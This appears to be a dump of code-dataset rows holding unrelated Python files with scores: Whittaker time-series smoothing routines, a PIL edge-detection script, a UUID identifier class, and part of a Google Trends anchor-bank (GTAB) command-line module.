d[m] = w[m] + lmda - (c[i1] * c[i1]) * d[i1] - (e[i2] * e[i2]) * d[i2]
z[m] = (w[m] * y[m] - c[i1] * z[i1] - e[i2] * z[i2]) / d[m]
z[m - 1] = z[m - 1] / d[m - 1] - c[m - 1] * z[m]
for i in range(m - 2, -1, -1):
z[i] = z[i] / d[i] - c[i] * z[i + 1] - e[i] * z[i + 2]
return z
@guvectorize(
[(float64[:], float64, float64, int16[:])], "(n),(),() -> (n)", nopython=True
)
def ws2dgu(y, lmda, nodata, out):
"""
Whittaker smoother with fixed lambda (S).
Args:
y: time-series numpy array
l: smoothing parameter lambda (S)
w: weights numpy array
p: "Envelope" value
Returns:
Smoothed time-series array z
"""
m = y.shape[0]
w = numpy.zeros(y.shape, dtype=float64)
n = 0
for ii in range(m):
if y[ii] == nodata:
w[ii] = 0
else:
n += 1
w[ii] = 1
if n > 1:
z = ws2d(y, lmda, w)
numpy.round_(z, 0, out)
else:
out[:] = y[:]
@guvectorize(
[(float64[:], float64, float64, float64, int16[:])],
"(n),(),(),() -> (n)",
nopython=True,
)
def ws2dpgu(y, lmda, nodata, p, out):
"""
Whittaker smoother with asymmetric smoothing and fixed lambda (S).
Args:
y: time-series numpy array
l: smoothing parameter lambda (S)
w: weights numpy array
p: "Envelope" value
Returns:
Smoothed time-series array z
"""
w = numpy.zeros(y.shape, dtype=float64)
m = y.shape[0]
n = 0
for ii in range(m):
if y[ii] == nodata:
w[ii] = 0
else:
n += 1
w[ii] = 1
if n > 1:
p1 = 1 - p
z = numpy.zeros(m)
znew = numpy.zeros(m)
wa = numpy.zeros(m)
ww = numpy.zeros(m)
# Calculate weights
for _ in range(10):
for j in range(m):
y_tmp = y[j]
z_tmp = z[j]
if y_tmp > z_tmp:
wa[j] = p
else:
wa[j] = p1
ww[j] = w[j] * wa[j]
znew[:] = ws2d(y, lmda, ww)
z_tmp = 0.0
j = 0
for j in range(m):
z_tmp += abs(znew[j] - z[j])
if z_tmp == 0.0:
break
z[:] = znew[:]
z = ws2d(y, lmda, ww)
numpy.round_(z, 0, out)
else:
out[:] = y[:]
@guvectorize(
[(float64[:], float64, float64[:], int16[:], float64[:])],
"(n),(),(m) -> (n),()",
nopython=True,
)
def ws2doptv(y, nodata, llas, out, lopt):
"""
Whittaker filter V-curve optimization of S.
Args:
y (numpy.array): raw data array (1d, expected in float64)
nodata (double, int): nodata value
llas (numpy.array): 1d array of s values to use for optimization
"""
m = y.shape[0]
w = numpy.zeros(y.shape, dtype=float64)
n = 0
for ii in range(m):
if y[ii] == nodata:
w[ii] = 0
else:
n += 1
w[ii] = 1
if n > 1:
m1 = m - 1
m2 = m - 2
nl = len(llas)
nl1 = nl - 1
i = 0
k = 0
fits = numpy.zeros(nl)
pens = numpy.zeros(nl)
z = numpy.zeros(m)
diff1 = numpy.zeros(m1)
lamids = numpy.zeros(nl1)
v = numpy.zeros(nl1)
# Compute v-curve
for lix in range(nl):
lmda = pow(10, llas[lix])
z[:] = ws2d(y, lmda, w)
for i in range(m):
w_tmp = w[i]
y_tmp = y[i]
z_tmp = z[i]
fits[lix] += pow(w_tmp * (y_tmp - z_tmp), 2)
fits[lix] = log(fits[lix])
for i in range(m1):
z_tmp = z[i]
z2 = z[i + 1]
diff1[i] = z2 - z_tmp
for i in range(m2):
z_tmp = diff1[i]
z2 = diff1[i + 1]
pens[lix] += pow(z2 - z_tmp, 2)
pens[lix] = log(pens[lix])
# Construct v-curve
llastep = llas[1] - llas[0]
for i in range(nl1):
l1 = llas[i]
l2 = llas[i + 1]
f1 = fits[i]
f2 = fits[i + 1]
p1 = pens[i]
p2 = pens[i + 1]
v[i] = sqrt(pow(f2 - f1, 2) + pow(p2 - p1, 2)) / (log(10) * llastep)
lamids[i] = (l1 + l2) / 2
vmin = v[k]
for i in range(1, nl1):
if v[i] < vmin:
vmin = v[i]
k = i
lopt[0] = pow(10, lamids[k])
z = ws2d(y, lopt[0], w)
numpy.round_(z, 0, out)
else:
out[:] = y[:]
lopt[0] = 0.0
@guvectorize(
[(float64[:], float64, float64, float64[:], int16[:], float64[:])],
"(n),(),(),(m) -> (n),()",
nopython=True,
)
def ws2doptvp(y, nodata, p, llas, out, lopt):
"""
Whittaker filter V-curve optimization of S and asymmetric weights.
Args:
y (numpy.array): raw data array (1d, expected in float64)
nodata (double, int): nodata value
p (float): Envelope value for asymmetric weights
llas (numpy.array): 1d array of s values to use for optimization
"""
m = y.shape[0]
w = numpy.zeros(y.shape, dtype=float64)
n = 0
for ii in range(m):
if y[ii] == nodata:
w[ii] = 0
else:
n += 1
w[ii] = 1
if n > 1:
m1 = m - 1
m2 = m - 2
nl = len(llas)
nl1 = nl - 1
i = 0
k = 0
j = 0
p1 = 1 - p
fits = numpy.zeros(nl)
pens = numpy.zeros(nl)
z = numpy.zeros(m)
znew = numpy.zeros(m)
diff1 = numpy.zeros(m1)
lamids = numpy.zeros(nl1)
v = numpy.zeros(nl1)
wa = numpy.zeros(m)
ww = numpy.zeros(m)
# Compute v-curve
for lix in range(nl):
lmda = pow(10, llas[lix])
for i in range(10):
for j in range(m):
y_tmp = y[j]
z_tmp = z[j]
if y_tmp > z_tmp:
wa[j] = p
else:
wa[j] = p1
ww[j] = w[j] * wa[j]
znew[:] = ws2d(y, lmda, ww)
z_tmp = 0.0
j = 0
for j in range(m):
z_tmp += abs(znew[j] - z[j])
if z_tmp == 0.0:
break
z[0:m] = znew[0:m]
for i in range(m):
w_tmp = w[i]
y_tmp = y[i]
z_tmp = z[i]
fits[lix] += pow(w_tmp * (y_tmp - z_tmp), 2)
fits[lix] = log(fits[lix])
for i in range(m1):
z_tmp = z[i]
z2 = z[i + 1]
diff1[i] = z2 - z_tmp
for i in range(m2):
z_tmp = diff1[i]
z2 = diff1[i + 1]
pens[lix] += pow(z2 - z_tmp, 2)
pens[lix] = log(pens[lix])
# Construct v-curve
llastep = llas[1] - llas[0]
for i in range(nl1):
l1 = llas[i]
l2 = llas[i + 1]
fit1 = fits[i]
fit2 = fits[i + 1]
pen1 = pens[i]
pen2 = pens[i + 1]
v[i] = sqrt(pow(fit2 - fit1, 2) + pow(pen2 - pen1, 2)) / (log(10) * llastep)
lamids[i] = (l1 + l2) / 2
vmin = v[k]
for i in range(1, nl1):
if v[i] < vmin:
vmin = v[i]
k = i
lopt[0] = pow(10, lamids[k])
z[:] = 0.0
for i in range(10):
for j in range(m):
y_tmp = y[j]
z_tmp = z[j]
if y_tmp > z_tmp:
wa[j] = p
else:
wa[j] = p1
ww[j] = w[j] * wa[j]
znew[0:m] = ws2d(y, lopt[0], ww)
z_tmp = 0.0
j = 0
for j in range(m):
z_tmp += abs(znew[j] - z[j])
if z_tmp == 0.0:
break
z[0:m] = znew[0:m]
z = ws2d(y, lopt[0], ww)
numpy.round_(z, 0, out)
else:
out[:] = y[:]
lopt[0] = 0.0
@guvectorize(
[(int16[:], float64, float64, float64, int16[:], float64[:])],
"(n),(),(),() -> (n),()",
nopython=True,
)
def ws2doptvplc(y, nodata, p, lc, out, lopt):
"""
Whittaker filter V-curve optimization.
Whittaker filter V-curve optimization of S, asymmetric weights and
srange determined by autocorrelation.
Args:
y (numpy.array): raw data array (1d, expected in float64)
nodata (double, int): nodata value
p (float): Envelope value for asymmetric weights
lc (float): lag1 autocorrelation
"""
m = y.shape[0]
w = numpy.zeros(y.shape, dtype=float64)
n = 0
for ii in range(m):
if y[ii] == nodata:
w[ii] = 0
else:
n += 1
w[ii] = 1
if n > 1:
if lc > 0.5:
llas = numpy.arange(-2, 1.2, 0.2, dtype=float64)
elif lc <= 0.5:
llas = numpy.arange(0, 3.2, 0.2, dtype=float64)
else:
llas = numpy.arange(-1, 1.2, 0.2, dtype=float64)
m1 = m - 1
m2 = m - 2
nl = len(llas)
nl1 = nl - 1
i = 0
k = 0
j = 0
p1 = 1 - p
fits = numpy.zeros(nl)
pens = numpy.zeros(nl)
z = numpy.zeros(m)
znew = numpy.zeros(m)
diff1 = numpy.zeros(m1)
lamids = numpy.zeros(nl1)
v = numpy.zeros(nl1)
wa = numpy.zeros(m)
ww = numpy.zeros(m)
# Compute v-curve
for lix in range(nl):
lmda = pow(10, llas[lix])
for i in range(10):
for j in range(m):
y_tmp = y[j]
z_tmp = z[j]
if y_tmp > z_tmp:
wa[j] = p
else:
wa[j] = p1
ww[j] = w[j] * wa[j]
znew[:] = ws2d(y, lmda, ww)
z_tmp = 0.0
j = 0
for j in range(m):
z_tmp += abs(znew[j] - z[j])
if z_tmp == 0.0:
break
z[0:m] = znew[0:m]
for i in range(m):
w_tmp = w[i]
y_tmp = y[i]
z_tmp = z[i]
fits[lix] += pow(w_tmp * (y_tmp - z_tmp), 2)
fits[lix] = log(fits[lix])
for i in range(m1):
z_tmp = z[i]
z2 = z[i + 1]
diff1[i] = z2 - z_tmp
for i in range(m2):
z_tmp = diff1[i]
z2 = diff1[i + 1]
pens[lix] += pow(z2 - z_tmp, 2)
pens[lix] = log(pens[lix])
# Construct v-curve
llastep = llas[1] - llas[0]
for i in range(nl1):
l1 = llas[i]
l2 = llas[i + 1]
fit1 = fits[i]
fit2 = fits[i + 1]
pen1 = pens[i]
pen2 = pens[i + 1]
v[i] = sqrt(pow(fit2 - fit1, 2) + pow(pen2 - pen1, 2)) / (log(10) * llastep)
lamids[i] = (l1 + l2) / 2
vmin = v[k]
for i in range(1, nl1):
if v[i] < vmin:
vmin = v[i]
k = i
lopt[0] = pow(10, lamids[k])
z[:] = 0.0
for i in range(10):
for j in range(m):
y_tmp = y[j]
z_tmp = z[j]
if y_tmp > z_tmp:
wa[j] = p
else:
wa[j] = p1
ww[j] = w[j] * wa[j]
znew[0:m] = ws2d(y, lopt[0], ww)
z_tmp = 0.0
j = 0
for j in range(m):
z_tmp += abs(znew[j] - z[j])
if z_tmp == 0.0:
break
z[0:m] = znew[0:m]
z = ws2d(y, lopt[0], ww)
numpy.round_(z, 0, out)
else:
out[:] = y[:]
lopt[0] = 0.0
def whits(
ds: xarray.Dataset,
dim: str,
nodata: Union[int, float],
sg: xarray.DataArray = None,
s: float = None,
p: float = None,
) -> xarray.Dataset:
"""
Apply whittaker with fixed S.
Fixed S can be either provided as constant or
as sgrid with a constant per pixel
Args:
ds: input dataset,
dim: dimension to use for filtering
nodata: nodata value
sg: sgrid,
s: S value
p: Envelope value for asymmetric weights
Returns:
ds_out: xarray.Dataset with smoothed data
"""
if sg is None and s is None:
raise ValueError("Need S or sgrid")
lmda = sg if sg is not None else s
if p is not None:
xout = xarray.apply_ufunc(
ws2dpgu,
ds[dim],
lmda,
nodata,
p,
input_core_dims=[["time"], [], [], []],
output_core_dims=[["time"]],
dask="parallelized",
keep_attrs=True,
)
else:
xout = xarray.apply_ufunc(
ws2dgu,
ds[dim],
lmda,
nodata,
input_core_dims=[["time"], [], []],
output_core_dims=[["time"]],
dask="parallelized",
keep_attrs=True,
)
return xout
def whitsvc(
ds: xarray.Dataset,
dim: str,
nodata: Union[int, float],
lc: xarray.DataArray = None,
srange: numpy.ndarray = None,
p: float = None,
) -> xarray.Dataset:
"""
Apply whittaker with V-curve optimization of S.
Args:
ds: input dataset,
dim: dimension to use for filtering
nodata: nodata value
lc: lag1 autocorrelation DataArray,
srange: values of S for V-curve optimization (mandatory if no autocorrelation raster)
p: Envelope value for asymmetric weights
Returns:
ds_out: xarray.Dataset with smoothed data and sgrid
"""
if lc is not None:
if p is None:
raise ValueError("If lc is set, a p value needs to be specified as well.")
ds_out, sgrid = xarray.apply_ufunc(
ws2doptvplc,
ds[dim],
nodata,
p,
lc,
input_core_dims=[["time"], [], [], []],
output_core_dims=[["time"], []],
dask="parallelized",
keep_attrs=True,
)
else:
if srange is None:
raise ValueError("Need either lagcorr or srange!")
if p:
ds_out, sgrid = xarray.apply_ufunc(
ws2doptvp,
ds[dim],
nodata,
p,
srange,
input_core_dims=[["time"], [], [], ["dim0"]],
output_core_dims=[["time"], []],
dask="parallelized",
keep_attrs=True,
)
else:
ds_out, sgrid = xarray.apply_ufunc(
ws2doptv,
ds[dim],
nodata,
srange,
input_core_dims=[["time"], [], ["dim0"]],
output_core_dims=[["time"], []],
dask="parallelized",
keep_attrs=True,
)
ds_out = ds_out.to_dataset()
ds_out["sgrid"] = numpy.log10(sgrid).astype("float32")
return ds_out
def whitint(
ds: xarray.Dataset, dim: str, labels_daily: numpy.ndarray, template: numpy.ndarray
):
"""Perform temporal interpolation using the Whittaker filter."""
template_out = numpy.zeros(numpy.unique(labels_daily).size, dtype="u1")
ds_out = xarray.apply_ufunc(
tinterpolate,
ds[dim],
template,
labels_daily,
template_out,
input_core_dims=[["time"], ["dim0"], ["dim1"], ["dim2"]],
output_core_dims=[["newtime"]],
dask_gufunc_kwargs={"output_sizes": {"newtime": template_out.size}},
output_dtypes=["int16"],
dask="parallelized",
keep_attrs=True,
)
return ds_out
@njit
def autocorr(x):
"""
Calculate Lag-1 autocorrelation.
Adapted from https://stackoverflow.com/a/29194624/5997555
Args:
x: 3d data array
Returns:
Lag-1 autocorrelation array
"""
r, c, t = x.shape
z = numpy.zeros((r, c), dtype="float32")
M = t - 1
for rr in range(r):
for cc in range(c):
data1 = x[rr, cc, 1:]
data2 = x[rr, cc, :-1]
sum1 = 0.0
sum2 = 0.0
for i in range(M):
sum1 += data1[i]
sum2 += data2[i]
mean1 = sum1 / M
mean2 = sum2 / M
var_sum1 = 0.0
var_sum2 = 0.0
cross_sum = 0.0
for i in range(M):
var_sum1 += (data1[i] - mean1) ** 2
var_sum2 += (data2[i] - mean2) ** 2
cross_sum += data1[i] * data2[i]
std1 = (var_sum1 / M) ** 0.5
std2 = (var_sum2 / M) ** 0.5
cross_mean = cross_sum / M
if std1 != 0 and std2 != 0:
lc = (cross_mean - mean1 * mean2) / (std1 * std2)
else:
lc = 0.0
z[rr, cc] = lc
return z
def lag1corr(ds: xarray.Dataset, dim: str):
"""
Xarray wrapper for autocorr.
Args:
ds: input dataset,
dim: dimension to use for calculation
Returns:
xarray.DataArray with lag1 autocorrelation
"""
return xarray.apply_ufunc(
autocorr,
ds[dim],
input_core_dims=[["time"]],
dask="parallelized",
output_dtypes=["float32"],
)
@guvectorize(
[(int16[:], float64[:], int32[:], uint8[:], int16[:])],
"(n),(m),(m),(l) -> (l)",
nopython=True,
)
def tinterpolate(x, template, labels, template_out, out): # pylint: disable=W0613
"""
Temporal interpolation of smoothed data.
Args:
x: smoothed data
template: zeros array in daily length with 1s marking smoothed data
labels: array of labels for grouping of length equal to template
template_out: helper array to determine the length of output array
"""
temp = template.copy()
w = template.copy()
ii = 0
jj = 0
for tt in temp:
if tt != 0:
temp[ii] = x[jj]
jj += 1
ii += 1
temp[-1] = x[-1]
z = ws2d(temp, 0.00001, w)
ii = 1
jj = 1
kk = 0
v = z[0]
for ll in labels[1:]:
if ll == labels[ii - 1]:
v += z[ii]
jj += 1
else:
out[kk] = round(v / jj)
kk += 1
jj = 1
v = z[ii]
ii += 1
out[kk] = round(v / jj) | 0.741768 | 0.474814 |
from PIL import Image
BLACK = (0,0,0)
WHITE = (255,255,255)
GREEN = (0,255,0)
RED = (255,0,0)
BLUE = (0,0,255)
"""
prcessImage - colors the edges of the image and saves it to the 'result' folder
@ARGS
path (utf string) - the path of the original image [ default - path to sample image ]
Mu (int) - we define the intensity with the 'mu' so if we set it higher it will only pick drastic changes [ default - 20 the optimal value ]
"""
def prcessImage( path = './sample-images/jpeg-home.jpeg', Mu = 20 ):
## We get the image and the load the pixels from it
im = Image.open(path) # Can be many different formats.
pix = im.load()
## Getting my image sizes
width = im.size[0]
height = im.size[1]
## Running from top to bottom of the image and changing the color of out picture to show predicted edges
for x in range(1,width-1):
for y in range(1,height-1):
if abs(pix[x,y][0] - pix[x,y+1][0]) > Mu:
pix[x,y] = GREEN
if abs(pix[x,y][1] - pix[x,y+1][1]) > Mu:
pix[x,y] = GREEN
if abs(pix[x,y][2] - pix[x,y+1][2]) > Mu:
pix[x,y] = GREEN
## Running from left to right of the image and changing the color of out picture to show predicted edges
for y in range(1,height-1):
for x in range(1,width-1):
if abs(pix[x,y][0] - pix[x+1,y][0]) > Mu:
pix[x,y] = GREEN
if abs(pix[x,y][1] - pix[x+1,y][1]) > Mu:
pix[x,y] = GREEN
if abs(pix[x,y][2] - pix[x+1,y][2]) > Mu:
pix[x,y] = GREEN
## Saving the image so it can be loaded from main window
im.save('./result/result.jpg')
'''
exit() #Exit the program so the second method is not effecting
count = 0
avarageChangeR = 0
avarageChangeG = 0
avarageChangeB = 0
avarageChange = 0
changeArrey = []
for x in range(1,width-1):
for y in range(1,height-1):
count += 1
avarageChangeR += abs(pix[x,y][0] - pix[x,y+1][0])
avarageChangeG += abs(pix[x,y][1] - pix[x,y+1][1])
avarageChangeB += abs(pix[x,y][2] - pix[x,y+1][2])
for y in range(1,height-1):
for x in range(1,width-1):
count += 1
avarageChangeR += abs(pix[x,y][0] - pix[x,y+1][0])
avarageChangeG += abs(pix[x,y][1] - pix[x,y+1][1])
avarageChangeB += abs(pix[x,y][2] - pix[x,y+1][2])
avarageChangeR = Mu*avarageChangeR/(2*count)
avarageChangeG = Mu*avarageChangeG/(2*count)
avarageChangeB = Mu*avarageChangeB/(2*count)
print("avarage Change",avarageChange)
for x in range(1,width-1):
for y in range(1,height-1):
if abs(pix[x,y][0] - pix[x,y+1][0]) > avarageChangeR:
changeArrey.append([x,y])
elif abs(pix[x,y][1] - pix[x,y+1][1]) > avarageChangeG:
changeArrey.append([x,y])
elif abs(pix[x,y][2] - pix[x,y+1][2]) > avarageChangeB:
changeArrey.append([x,y])
for y in range(1,height-1):
for x in range(1,width-1):
if abs(pix[x,y][0] - pix[x,y+1][0]) > avarageChangeR:
changeArrey.append([x,y])
elif abs(pix[x,y][1] - pix[x,y+1][1]) > avarageChangeG:
changeArrey.append([x,y])
elif abs(pix[x,y][2] - pix[x,y+1][2]) > avarageChangeB:
changeArrey.append([x,y])
avarageChange = avarageChange/height
for pix_cord in changeArrey:
x_cord = pix_cord[0]
y_cord = pix_cord[1]
pix[x_cord,y_cord] = BLACK
im.save('./result/alive_parrot.png') # Save the modified pixels as .png
''' | main.py | from PIL import Image
BLACK = (0,0,0)
WHITE = (255,255,255)
GREEN = (0,255,0)
RED = (255,0,0)
BLUE = (0,0,255)
"""
prcessImage - colors the edges of the image and saves it to the 'result' folder
@ARGS
path (utf string) - the path of the original image [ default - path to sample image ]
Mu (int) - we define the intensity with the 'mu' so if we set it higher it will only pick drastic changes [ default - 20 the optimal value ]
"""
def prcessImage( path = './sample-images/jpeg-home.jpeg', Mu = 20 ):
## We get the image and the load the pixels from it
im = Image.open(path) # Can be many different formats.
pix = im.load()
## Getting my image sizes
width = im.size[0]
height = im.size[1]
## Running from top to bottom of the image and changing the color of out picture to show predicted edges
for x in range(1,width-1):
for y in range(1,height-1):
if abs(pix[x,y][0] - pix[x,y+1][0]) > Mu:
pix[x,y] = GREEN
if abs(pix[x,y][1] - pix[x,y+1][1]) > Mu:
pix[x,y] = GREEN
if abs(pix[x,y][2] - pix[x,y+1][2]) > Mu:
pix[x,y] = GREEN
## Running from left to right of the image and changing the color of out picture to show predicted edges
for y in range(1,height-1):
for x in range(1,width-1):
if abs(pix[x,y][0] - pix[x+1,y][0]) > Mu:
pix[x,y] = GREEN
if abs(pix[x,y][1] - pix[x+1,y][1]) > Mu:
pix[x,y] = GREEN
if abs(pix[x,y][2] - pix[x+1,y][2]) > Mu:
pix[x,y] = GREEN
## Saving the image so it can be loaded from main window
im.save('./result/result.jpg')
'''
exit() #Exit the program so the second method is not effecting
count = 0
avarageChangeR = 0
avarageChangeG = 0
avarageChangeB = 0
avarageChange = 0
changeArrey = []
for x in range(1,width-1):
for y in range(1,height-1):
count += 1
avarageChangeR += abs(pix[x,y][0] - pix[x,y+1][0])
avarageChangeG += abs(pix[x,y][1] - pix[x,y+1][1])
avarageChangeB += abs(pix[x,y][2] - pix[x,y+1][2])
for y in range(1,height-1):
for x in range(1,width-1):
count += 1
avarageChangeR += abs(pix[x,y][0] - pix[x,y+1][0])
avarageChangeG += abs(pix[x,y][1] - pix[x,y+1][1])
avarageChangeB += abs(pix[x,y][2] - pix[x,y+1][2])
avarageChangeR = Mu*avarageChangeR/(2*count)
avarageChangeG = Mu*avarageChangeG/(2*count)
avarageChangeB = Mu*avarageChangeB/(2*count)
print("avarage Change",avarageChange)
for x in range(1,width-1):
for y in range(1,height-1):
if abs(pix[x,y][0] - pix[x,y+1][0]) > avarageChangeR:
changeArrey.append([x,y])
elif abs(pix[x,y][1] - pix[x,y+1][1]) > avarageChangeG:
changeArrey.append([x,y])
elif abs(pix[x,y][2] - pix[x,y+1][2]) > avarageChangeB:
changeArrey.append([x,y])
for y in range(1,height-1):
for x in range(1,width-1):
if abs(pix[x,y][0] - pix[x,y+1][0]) > avarageChangeR:
changeArrey.append([x,y])
elif abs(pix[x,y][1] - pix[x,y+1][1]) > avarageChangeG:
changeArrey.append([x,y])
elif abs(pix[x,y][2] - pix[x,y+1][2]) > avarageChangeB:
changeArrey.append([x,y])
avarageChange = avarageChange/height
for pix_cord in changeArrey:
x_cord = pix_cord[0]
y_cord = pix_cord[1]
pix[x_cord,y_cord] = BLACK
im.save('./result/alive_parrot.png') # Save the modified pixels as .png
''' | 0.313 | 0.458106 |
from uuid import UUID
class Identifier:
def __init__(self, value: UUID) -> None:
self.value = value
def __eq__(self, other: object) -> bool:
if isinstance(other, Identifier):
if isinstance(other, type(self)) or isinstance(self, type(other)):
if isinstance(other.value, type(self.value)):
return self.value == other.value
if isinstance(self.value, type(other.value)):
return other.value == self.value
return NotImplemented
return NotImplemented
return NotImplemented
def __ne__(self, other: object) -> bool:
if isinstance(other, Identifier):
if isinstance(other, type(self)) or isinstance(self, type(other)):
if isinstance(other.value, type(self.value)):
return self.value != other.value
if isinstance(self.value, type(other.value)):
return other.value != self.value
return NotImplemented
return NotImplemented
return NotImplemented
def __lt__(self, other: object) -> bool:
if isinstance(other, Identifier):
if isinstance(other, type(self)) or isinstance(self, type(other)):
if isinstance(other.value, type(self.value)):
return self.value < other.value
if isinstance(self.value, type(other.value)):
return other.value > self.value
return NotImplemented
return NotImplemented
return NotImplemented
def __le__(self, other: object) -> bool:
if isinstance(other, Identifier):
if isinstance(other, type(self)) or isinstance(self, type(other)):
if isinstance(other.value, type(self.value)):
return self.value <= other.value
if isinstance(self.value, type(other.value)):
return other.value >= self.value
return NotImplemented
return NotImplemented
return NotImplemented
def __gt__(self, other: object) -> bool:
if isinstance(other, Identifier):
if isinstance(other, type(self)) or isinstance(self, type(other)):
if isinstance(other.value, type(self.value)):
return self.value > other.value
if isinstance(self.value, type(other.value)):
return other.value < self.value
return NotImplemented
return NotImplemented
return NotImplemented
def __ge__(self, other: object) -> bool:
if isinstance(other, Identifier):
if isinstance(other, type(self)) or isinstance(self, type(other)):
if isinstance(other.value, type(self.value)):
return self.value >= other.value
if isinstance(self.value, type(other.value)):
return other.value <= self.value
return NotImplemented
return NotImplemented
return NotImplemented
def __hash__(self) -> int:
return hash(self.value)
def __str__(self) -> str:
return str(self.value) | src/fbsrankings/common/identifier.py | from uuid import UUID
class Identifier:
def __init__(self, value: UUID) -> None:
self.value = value
def __eq__(self, other: object) -> bool:
if isinstance(other, Identifier):
if isinstance(other, type(self)) or isinstance(self, type(other)):
if isinstance(other.value, type(self.value)):
return self.value == other.value
if isinstance(self.value, type(other.value)):
return other.value == self.value
return NotImplemented
return NotImplemented
return NotImplemented
def __ne__(self, other: object) -> bool:
if isinstance(other, Identifier):
if isinstance(other, type(self)) or isinstance(self, type(other)):
if isinstance(other.value, type(self.value)):
return self.value != other.value
if isinstance(self.value, type(other.value)):
return other.value != self.value
return NotImplemented
return NotImplemented
return NotImplemented
def __lt__(self, other: object) -> bool:
if isinstance(other, Identifier):
if isinstance(other, type(self)) or isinstance(self, type(other)):
if isinstance(other.value, type(self.value)):
return self.value < other.value
if isinstance(self.value, type(other.value)):
return other.value > self.value
return NotImplemented
return NotImplemented
return NotImplemented
def __le__(self, other: object) -> bool:
if isinstance(other, Identifier):
if isinstance(other, type(self)) or isinstance(self, type(other)):
if isinstance(other.value, type(self.value)):
return self.value <= other.value
if isinstance(self.value, type(other.value)):
return other.value >= self.value
return NotImplemented
return NotImplemented
return NotImplemented
def __gt__(self, other: object) -> bool:
if isinstance(other, Identifier):
if isinstance(other, type(self)) or isinstance(self, type(other)):
if isinstance(other.value, type(self.value)):
return self.value > other.value
if isinstance(self.value, type(other.value)):
return other.value < self.value
return NotImplemented
return NotImplemented
return NotImplemented
def __ge__(self, other: object) -> bool:
if isinstance(other, Identifier):
if isinstance(other, type(self)) or isinstance(self, type(other)):
if isinstance(other.value, type(self.value)):
return self.value >= other.value
if isinstance(self.value, type(other.value)):
return other.value <= self.value
return NotImplemented
return NotImplemented
return NotImplemented
def __hash__(self) -> int:
return hash(self.value)
def __str__(self) -> str:
return str(self.value) | 0.639511 | 0.116161 |
import argparse
import copy
import glob
import json
import os
from .core import GTAB
dir_path = os.path.dirname(os.path.abspath(__file__))
# --- UTILITY METHODS ---
class GroupedAction(argparse.Action):
def __call__(self, parser, namespace, values, option_string=None):
group, dest = self.dest.split('.', 2)
groupspace = getattr(namespace, group, argparse.Namespace())
setattr(groupspace, dest, values)
setattr(namespace, group, groupspace)
def _load_dir_cl():
with open(os.path.join(dir_path, "config", "dir_cl.json"), 'r') as fp:
dir_cl = json.load(fp)
if dir_cl['dir_cl'].strip() == "":
raise Exception("No active directory set! Must call 'init' first!")
print(dir_cl['active_gtab'])
return dir_cl['dir_cl'], dir_cl['active_gtab']
# --- "EXPOSED" METHODS ---
def init_dir():
parser = argparse.ArgumentParser(prog='init_dir')
parser.add_argument("path", help="Path of the desired directory to be initialized/used.", type=str)
args = parser.parse_args()
path = os.path.abspath(args.path)
t = GTAB(path, from_cli=True)
with open(os.path.join(dir_path, "config", "dir_cl.json"), 'w') as fp:
json.dump({"dir_cl": path, "active_gtab": "google_anchorbank_geo=_timeframe=2019-01-01 2020-08-01.tsv"}, fp,
indent=4, sort_keys=True)
print("Directory initialized!")
def print_options():
dir_cl, _ = _load_dir_cl()
print(f"Active directory is: {dir_cl}")
t = GTAB(dir_cl, from_cli=True)
t.print_options()
return None
def set_options():
parser = argparse.ArgumentParser(prog="set_options")
parser.add_argument("--geo", type=str, dest="pytrends.geo", action=GroupedAction, default=argparse.SUPPRESS)
parser.add_argument("--timeframe", type=str, dest='pytrends.timeframe', action=GroupedAction,
default=argparse.SUPPRESS)
parser.add_argument("--num_anchor_candidates", type=int, dest='gtab.num_anchor_candidates', action=GroupedAction,
default=argparse.SUPPRESS)
parser.add_argument("--num_anchors", type=int, dest='gtab.num_anchors', action=GroupedAction,
default=argparse.SUPPRESS)
parser.add_argument("--seed", type=int, dest='gtab.seed', action=GroupedAction, default=argparse.SUPPRESS)
parser.add_argument("--sleep", type=float, dest='gtab.sleep', action=GroupedAction, default=argparse.SUPPRESS)
parser.add_argument("--thresh_offline", type=int, dest='gtab.thresh_offline', action=GroupedAction,
default=argparse.SUPPRESS)
parser.add_argument("--backoff_factor", type=float, dest='conn.backoff_factor', action=GroupedAction,
default=argparse.SUPPRESS)
parser.add_argument("--proxies", type=str, dest='conn.proxies', action=GroupedAction, default=argparse.SUPPRESS,
nargs="+")
parser.add_argument("--retries", type=int, dest='conn.retries', action=GroupedAction, default=argparse.SUPPRESS)
parser.add_argument("--timeout", type=int, dest='conn.timeout', action=GroupedAction, default=argparse.SUPPRESS,
nargs=2)
args = vars(parser.parse_args())
dir_cl, _ = _load_dir_cl()
t = GTAB(dir_cl, from_cli=True)
t.set_options(pytrends_config=vars(args.get('pytrends')) if args.get('pytrends') != None else None,
gtab_config=vars(args.get('gtab')) if args.get('gtab') != None else None,
conn_config=vars(args.get('conn')) if args.get('conn') != None else None,
overwite_file=True)
def set_blacklist():
parser = argparse.ArgumentParser(prog="set_blacklist")
parser.add_argument("blacklist", type=str, nargs='+')
args = parser.parse_args()
dir_cl, _ = _load_dir_cl()
t = GTAB(dir_cl, from_cli=True)
t.set_blacklist(args.blacklist, overwrite_file=True)
def set_hitraffic():
parser = argparse.ArgumentParser(prog="set_hitraffic")
parser.add_argument("hitraffic", type=str, nargs='+')
args = parser.parse_args()
dir_cl, _ = _load_dir_cl()
t = GTAB(dir_cl, from_cli=True)
t.set_hitraffic(args.hitraffic, overwrite_file=True)
def list_gtabs():
dir_cl, active_gtab = _load_dir_cl()
t = GTAB(dir_cl, from_cli=True)
if active_gtab.strip() != "":
t.set_active_gtab(active_gtab)
t.list_gtabs()
def rename_gtab():
parser = argparse.ArgumentParser(prog="rename_gtab")
parser.add_argument("src", type=str)
parser.add_argument("dst", type=str)
args = parser.parse_args()
dir_cl, active_gtab = _load_dir_cl()
t = GTAB(dir_cl, from_cli=True)
if active_gtab.strip() != "":
t.set_active_gtab(active_gtab)
t.rename_gtab(args.src, args.dst)
def delete_gtab():
parser = argparse.ArgumentParser(prog="delete_gtab")
parser.add_argument("src", type=str)
args = parser.parse_args()
dir_cl, active_gtab = _load_dir_cl()
t = GTAB(dir_cl, from_cli=True)
if active_gtab.strip() != "":
t.set_active_gtab(active_gtab)
t.delete_gtab(args.src)
def set_active_gtab():
parser = argparse.ArgumentParser(prog="set_active_gtab")
parser.add_argument("src", type=str)
args = parser.parse_args()
dir_cl, _ = _load_dir_cl()
t = GTAB(dir_cl, from_cli=True)
t.set_active_gtab(args.src)
with open(os.path.join(dir_path, "config", "dir_cl.json"), 'w') as fp:
json.dump({"dir_cl": dir_cl, "active_gtab": args.src}, fp, indent=4, sort_keys=True)
def create_gtab():
dir_cl, _ = _load_dir_cl()
t = GTAB(dir_cl, from_cli=True)
